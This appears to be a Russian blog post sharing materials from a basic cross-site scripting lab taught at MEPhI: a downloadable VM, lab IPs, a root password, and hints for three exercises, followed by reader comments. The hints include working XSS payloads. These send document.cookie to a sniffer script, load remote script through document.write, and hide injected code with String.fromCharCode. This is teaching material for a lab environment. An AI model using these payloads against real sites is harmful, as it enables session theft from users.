Материалы с мастер-класса по Cross-Site Scripting

Проводил в субботу на прошедшей неделе лабораторную работу в институте МИФИ по теме "Межсайтовое выполнение сценариев" (базовый уровень). Материалы лабораторной работы представлены ниже.

Раздаточный материал:


Виртуальную машину, можно забрать отсюда (UPDATED).
MD5 1cacb2332bf8247ad8b2f65cbd34cc73 *PT-XSS-LAB.rar

+ автоматизация на AutoIt доступна здесь.

Технические детали:

Для запуска виртуальной машины может использоваться VMWare Player. IP-адрес системы управления - 192.168.0.50 (management). IP-адрес системы для проведения лабораторной работы – 192.168.0.51 (target). Пароль на учетную запись "root" в ОС/MySQL – "hackmeMif1".

Примечание: действия администратора эмулировались на ОС Windows с использованием AutoIt (виртуальная машина с windows не выкладывается).

Подсказки по выполнению лабораторной работы.

Часть 1.

http://192.168.0.51:80/
http://192.168.0.51:8085/sniffer.php?id=31337&data=
http://192.168.0.51:8085/viewer.php?id=31337
<script>xss=new/**/Image().src='http://192.168.0.51:8085/sniffer.php?id=31337&data='+document.cookie;</script>

Часть 2.

http://192.168.0.51:81/
http://192.168.0.51:8085/act.js
http://192.168.0.51:81/layer.swf?url=javascript:alert(1);
javascript:document.write('<script/src=http://192.168.0.51:8085/act.js></script>')
javascript:eval(String.fromCharCode());
document.write('<script/src=http://192.168.0.51:8085/act.js></script>')
192.168.0.51:81/layer.swf?user=r00t&pass=31337&server=192.168.0.51&url=javascript:eval(String.fromCharCode(100, 111, 99, 117, 109, 101, 110, 116, 46, 119, 114, 105, 116, 101, 40, 39, 60, 115, 99, 114, 105, 112, 116, 47, 115, 114, 99, 61, 104, 116, 116, 112, 58, 47, 47, 49, 57, 50, 46, 49, 54, 56, 46, 48, 46, 53, 49, 58, 56, 48, 56, 53, 47, 97, 99, 116, 46, 106, 115, 62, 60, 47, 115, 99, 114, 105, 112, 116, 62, 39, 41));


Часть 3.

http://192.168.0.51:82/actions.php?s=100%3Cscript%3E
http://192.168.0.51:82/actions.php?s=1;alert/*skip*/('XSS');
192.168.0.51:82/actions.php?s=1;document.write('%3Cimg%20sr'%2b'c=http://192.168.0.51:8085/sniffer.php?id=31337%26data='%2bdocument['cookie']%2b'%3E');
http://192.168.0.51:8085/md5.php

12 комментариев :

  1. Дима, и как студенты, нормально выполняли работу? Смена растет? ;-)

    ОтветитьУдалить
  2. норм. на втором задании посоревновались за место в топе (последняя ссылка, по которой втыкает админ), я выиграл ;))

    ОтветитьУдалить
  3. Спасибо. Хотел сходить, не получилось. Потренируюсь.

    ОтветитьУдалить
  4. сцылко на образ битая =(

    ОтветитьУдалить
  5. действительно, битая:( во вторник попрошу, чтобы Антипов поправил.

    ОтветитьУдалить
  6. Ждём образ :)
    Да и почему презентации в PPT выкладывать (что избыточно), когда есть замечательный PDF?

    ОтветитьУдалить
  7. в этой презентации слишком много динамики :)

    ОтветитьУдалить
  8. Хоть бы ссылку дал на мою презенташку((

    ОтветитьУдалить
  9. мммм... Тимур, а где ты тут увидел свой материал?

    ОтветитьУдалить
  10. ссылку на виртуалку пофиксили

    ОтветитьУдалить
  11. Ссылка на виртуалку не работает

    ОтветитьУдалить